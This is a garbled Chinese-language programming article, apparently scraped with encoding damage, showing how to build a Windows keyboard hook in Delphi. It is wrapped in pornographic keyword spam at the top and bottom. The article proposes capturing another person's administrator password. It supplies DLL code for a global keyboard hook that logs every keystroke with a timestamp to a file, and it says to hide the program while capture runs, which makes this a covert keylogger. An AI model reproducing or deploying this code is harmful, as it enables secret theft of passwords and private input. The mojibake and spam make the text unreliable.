成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Delphi編程使用HOOK監(jiān)視Windows

開發(fā) 開發(fā)工具
本文是筆者在Delphi學(xué)習(xí)過程中,得出的個人體會,介紹了通過Delphi編程使用HOOK監(jiān)視Windows的具體方法,希望能與大家共同分享一下。

  文中詳細(xì)介紹了如何通過Delphi編程使用HOOK監(jiān)視Windows的步驟,同時給出了程序?qū)嵗?/P>

  每個程序都有自己的生存空間,在Windows系統(tǒng)中你可以在任何時候讓你的程序執(zhí)行一些操作,還可以觸發(fā)消息,觸發(fā)的消息分為三種,一是操作你程序的界面,onClick,onMouseMove等等,另外一個可以使用Windows的消息機制來捕獲一些系統(tǒng)消息,但是如果你想在任何時候監(jiān)控任何程序的情況那可能你就會選擇HOOK來實現(xiàn)了,雖然還有其他方法,但不得不承認(rèn),HOOK是一個比較簡單解決問題的途徑。

  下面就來舉個例子:

  如果你需要訪問某個人的機器,那在運行\(zhòng)\SB之后那個人就會在你機器上敲入他的adminsitrator密碼,當(dāng)然,你也可以使用黑客工具來得到他的密碼,但是,為什么不自己嘗試一下寫個程序記錄所有的鍵盤操作呢?

  首先需要申明一點,Hook不同于一般的應(yīng)用程序,需要作為一個全局DLL出現(xiàn),否則無法在你程序不激活的狀態(tài)捕獲其他信息的,(當(dāng)然你可以用Windows消息,這個問題不在這里討論)。

  寫個DLL定義一下函數(shù)

  1. function setkeyhook:bool;export;  
  2. function endkeyhook:bool;export;  
  3. procedure keyhookexit;far;  
  4. procedure SetMainHandle(Handle: HWND); export;forward;  
  5. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  6.  
  7. procedure EntryPointProc(Reason: Integer);  
  8.  const 
  9.   hMapObject: THandle = 0;  
  10.  begin  
  11.   case reason of  
  12.    DLL_PROCESS_ATTACH:  
  13.   begin  
  14.    hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);  
  15.    rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);  
  16.   end;  
  17.   DLL_PROCESS_DETACH:  
  18.  begin  
  19.  try 
  20.   UnMapViewOfFile(rHookRec);  
  21.   CloseHandle(hMapObject);  
  22.   except  
  23.  end;  
  24. end;  
  25. end;  
  26. end;  
  27. procedure keyhookexit;far;  
  28. begin  
  29. if hNexthookproc<>0 then endkeyhook;  
  30.  exitproc:=procsaveexit;  
  31. end;  
  32. function endkeyhook:bool;export;  
  33. begin  
  34. if hNexthookproc<>0 then  
  35. begin  
  36.  unhookwindowshookex(hNexthookproc);  
  37.  hNexthookproc:=0;  
  38.  messagebeep(0);  
  39. end;  
  40. result:=hNexthookproc=0;  
  41. MainHandle:=0;  
  42. end;  
  43.  
  44. function Setkeyhook:bool;export;  
  45. begin  
  46.  hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);  
  47.  result:=hNexthookproc<>0;  
  48. end;  
  49. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  50. var  
  51.  s:Tstringlist;  
  52. begin  
  53.  if icode<0 then  
  54.  begin  
  55.   result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);  
  56.   exit;  
  57.  end;  
  58.  if lparam<0 then  
  59.  begin  
  60.   exit;  
  61.  end;  
  62.  s:=TStringlist.Create;  
  63.  if FileExists(afilename) then  
  64.   s.LoadFromFile(afilename);  
  65.  
  66.   //將敲打的鍵盤字符保存到文件中   
  67.   s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );  
  68.   s.SaveToFile(afilename);  
  69.   s.Free;  
  70.  
  71.   result:=0;  
  72.  end;  

  Dll的Project文件中定義如下

  1. exports  
  2. setkeyhook index 1,  
  3. endkeyhook index 2,  
  4. SetMainHandle index 3;  
  5.  
  6. begin   
  7. hNexthookproc:=0;  
  8. procsaveexit:=exitproc;  
  9. DllProc := @EntryPointProc;  
  10. EntryPointProc(DLL_PROCESS_ATTACH);  
  11. end;

  這樣DLL就定義好了,接下來就是畫個界面:

  1. function setkeyhook:bool;external ’keyspy.dll’;  
  2. function endkeyhook:bool;external ’keyspy.dll’;  
  3. procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;  
  4. //開始捕獲鍵盤  
  5. SetMainHandle(handle);  
  6. setkeyhook  
  7. //中止捕獲鍵盤  
  8. endkeyhook    

  然后吧你程序隱蔽起來,啟動捕獲鍵盤,在中止捕獲之前,所有鍵盤操作都會被記錄到你所定義的filename這個文件名中去,注:這些代碼是臨時寫的,僅是為了說明如何寫個hook程序。

  另外Hook的功能不僅僅是簡單使用,這就需要靠大家靈活運用了,可以跟很多windows API來配合,通過很多技巧作出讓人意想不到的效果。

【編輯推薦】

  1. Delphi基礎(chǔ)開發(fā)技巧
  2. Delphi編程讀取txt文件數(shù)據(jù)
  3. 如何在Delphi中自動錄入數(shù)據(jù)
  4. 基于Delphi的屏幕抓圖技術(shù)的實現(xiàn)
  5. Delphi初學(xué)者應(yīng)小心的六大問題
  6. 淺析Delphi XE中的動態(tài)Hook某些內(nèi)部事件
責(zé)任編輯:韓亞珊 來源: 編程愛好者
相關(guān)推薦

2010-12-16 11:10:29

Windows Ser

2011-11-08 21:54:05

Windows 監(jiān)控

2011-01-05 09:14:38

Delphi XE

2011-04-06 08:54:25

Nagios監(jiān)視

2012-03-19 10:46:53

ibmdw

2009-10-26 09:49:26

監(jiān)視器監(jiān)視網(wǎng)絡(luò)通信

2010-05-31 19:35:23

Ubuntu mrtg

2010-01-25 13:31:27

C++程序

2018-12-05 10:10:23

Windows 10設(shè)置監(jiān)視器

2024-07-16 09:51:39

HTMLHookReact

2011-04-06 13:56:36

Delphi

2025-02-12 00:21:44

Java并發(fā)編程

2009-08-14 11:15:19

文件監(jiān)視C#Windows服務(wù)

2017-11-01 07:57:08

Python

2014-10-13 10:15:13

Android HOOCydia Subst

2011-04-06 16:07:44

Delphi

2012-03-09 17:31:50

ibmdw

2009-04-30 01:55:48

windows監(jiān)視器木馬

2010-07-07 13:39:33

SQL Server監(jiān)

2015-09-07 09:41:42

tshark網(wǎng)絡(luò)流量
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产日韩一区二区三区 | 久操国产 | 日韩免费一二三区 | 日韩插插| 在线播放一区二区三区 | 99成人| 一区二区三区四区国产 | 99re视频精品 | 国产成人精品一区二区三区在线观看 | 一区二区中文字幕 | 精品不卡 | 欧美日高清视频 | 欧美a在线| 久久国产成人 | 欧美一级欧美三级在线观看 | 青春草国产 | 人人干人人超 | 久久精品69 | 日韩av一区二区在线观看 | 亚洲字幕在线观看 | 国产在线精品一区二区三区 | 久久精品国产免费看久久精品 | 国产成人短视频在线观看 | 国产精品成人一区二区三区吃奶 | 日韩精品免费播放 | 国产激情一区二区三区 | 久久九 | 国产欧美精品一区二区三区 | 国产专区在线 | 久久久福利| 亚洲 欧美 精品 | 国产精品精品视频一区二区三区 | 91久久久久久久久 | 这里精品 | 精品欧美一区二区三区久久久 | 一区二区三区免费在线观看 | 日韩中文字幕一区 | 亚洲第一在线 | 成人精品鲁一区一区二区 | 日韩精品一区在线观看 | 欧美日韩亚洲视频 |